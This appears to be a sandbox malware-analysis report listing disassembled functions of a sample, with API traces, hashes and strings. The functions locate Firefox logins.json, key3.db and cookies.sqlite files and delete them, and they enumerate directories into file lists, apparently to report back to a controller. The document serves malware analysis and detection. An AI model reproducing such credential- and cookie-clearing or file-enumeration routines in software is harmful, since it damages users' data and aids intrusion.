                              Function 004057B6 Relevance: 86.0, APIs: 43, Strings: 6, Instructions: 250fileCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,76F90F00,00000000), ref: 004057C9
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,76F90F00,00000000), ref: 004057D6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,76F90F00,00000000), ref: 004057E3
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?,?,76F90F00,00000000), ref: 004057F5
                              • getenv.MSVCRT ref: 00405801
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,76F90F00,00000000), ref: 0040580D
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,00000000), ref: 00405819
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 00405822
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 0040582B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,004108F8,?,?,?,00000000), ref: 00405845
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040584F
                              • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00405856
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00405862
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,00000000), ref: 00405870
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405886
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                                • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?,?,?,00000000), ref: 004058A7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040594F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040595C
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405968
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405971
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040597A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405994
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059A1
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059AD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059B6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059BF
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059D0
                              • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059D7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405ADF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405AE8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405AF1
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V01@@V10@$??4?$basic_string@FileFind$?c_str@?$basic_string@Y?$basic_string@$CloseDeleteEventFirstNextV10@@getenv
                              • String ID: [Firefox StoredLogins cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                              • API String ID: 3561168790-1296180500
                              • Opcode ID: ebd61ce851d9d5d6887f5da50eba3fd7b6efa2494f83231cbe188e6d88d7582d
                              • Instruction ID: 0f5345415a6924a010703aecf2afa4763ea68f99ba4dbc0389945dcd7f619004
                              • Opcode Fuzzy Hash: ebd61ce851d9d5d6887f5da50eba3fd7b6efa2494f83231cbe188e6d88d7582d
                              • Instruction Fuzzy Hash: 15918F71A0014AAFDB10ABF0DC9D9EF7B79EB54304F048176E446A31A0EB7989C9CF58
                              Function 00403183 Relevance: 80.7, APIs: 45, Strings: 1, Instructions: 222fileCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00415268,76EAA270), ref: 00403198
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,00415268,76EAA270), ref: 004031A7
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,76EAA270), ref: 004031B1
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,76EAA270), ref: 004031BB
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 004031DE
                              • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 004031E8
                              • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004031FB
                              • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403215
                              • wcscmp.MSVCRT ref: 00403247
                              • wcscmp.MSVCRT ref: 0040325F
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00403277
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00403286
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00403293
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329E
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032A7
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032B6
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032C5
                                • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032D5
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 004032E9
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 004032F8
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00403302
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 0040330C
                              • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00403324
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 0040334E
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403358
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403364
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00403393
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00415268,?), ref: 004033A0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 004033B0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 004033BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033D6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033DF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033E8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033F4
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403401
                              • FindNextFileW.KERNEL32(000000FF,00000010), ref: 00403411
                              • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403422
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040342B
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403434
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040343D
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040344F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403458
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403461
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040346A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$Hstd@@V?$basic_string@$??0?$basic_string@$?begin@?$basic_string@D@2@@0@FindV10@0@$FileG@2@@0@V01@@$?end@?$basic_string@D@1@@G@1@@NextV10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstV01@V10@@V12@
                              • String ID: filefound
                              • API String ID: 3774306600-2220344067
                              • Opcode ID: 3ecc530b8e2115a68d32aec42f0b266e75c394ab017ddb5da7d189f112df4d08
                              • Instruction ID: 24ec99229332f1c5b72d1b304a02c10387bb8f3c273a52855c1da693c8ee490d
                              • Opcode Fuzzy Hash: 3ecc530b8e2115a68d32aec42f0b266e75c394ab017ddb5da7d189f112df4d08
                              • Instruction Fuzzy Hash: 9281E37190010EABCB14DFA0DC9D9DE7B7CFB15305F1081B6F516A21A0EF789A89CB58
                              Function 00405AFB Relevance: 63.2, APIs: 31, Strings: 5, Instructions: 193fileCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76F90F00,00000000), ref: 00405B0D
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405B1A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?), ref: 00405B2C
                              • getenv.MSVCRT ref: 00405B38
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00405B44
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405B50
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B59
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B62
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,004108F8,?), ref: 00405B7C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00405B86
                              • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 00405B8D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00405B99
                              • FindClose.KERNEL32(000000FF,?,?,?), ref: 00405BA7
                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 00405BCC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 00405C6D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00405C7A
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C86
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C8F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C98
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CA1
                              • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CA8
                              • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CB2
                              • FindNextFileA.KERNEL32(000000FF,00000010,?,?,?), ref: 00405CC6
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CD4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],?,?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CEB
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                                • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405D00
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405D09
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$Find$??0?$basic_string@D@1@@D@2@@0@FileHstd@@V01@V01@@V?$basic_string@$V10@$??4?$basic_string@?c_str@?$basic_string@CloseNextY?$basic_string@$DeleteErrorEventFirstLastV10@@getenv
                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                              • API String ID: 830200565-432212279
                              • Opcode ID: 663ac35bb398fc1408d61a9e220494b6fd96e6e84e3f951f2a66223ea91a2ac9
                              • Instruction ID: 9d0021f9074ca59868e7db579370f28baf2a5ec125cda6f041a2b5e7f9bf5000
                              • Opcode Fuzzy Hash: 663ac35bb398fc1408d61a9e220494b6fd96e6e84e3f951f2a66223ea91a2ac9
                              • Instruction Fuzzy Hash: 7F61903190410AAFDB00AFB0DC5D9EEBB78EF15314F104576E542E2190EE799ACACF98
                              Function 0040BC9B Relevance: 61.4, APIs: 32, Strings: 3, Instructions: 170fileCOMMON
                              Download Yara Rule
                              APIs
                              • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,6A41AFB0,6A41AFB0), ref: 0040BCB1
                              • FindFirstFileW.KERNEL32(00000000), ref: 0040BCB8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,err_notopendir,00415268,?,00415268,00000000,?,?,?,?), ref: 0040BCEC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040BCF9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?), ref: 0040BD06
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD25
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD2E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD37
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BD10
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040BD4C
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,004107A8), ref: 0040BD65
                              • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040BD6C
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040BD79
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040BD97
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040BDA1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BDAA
                              • FindNextFileW.KERNEL32(?,?), ref: 0040BDC0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040BDD5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 0040BDE4
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040BDF0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BDF9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE02
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,fileslist,00415268,?,00415268,?), ref: 0040BE31
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040BE3E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040BE4B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040BE55
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE6A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE73
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE85
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE8E
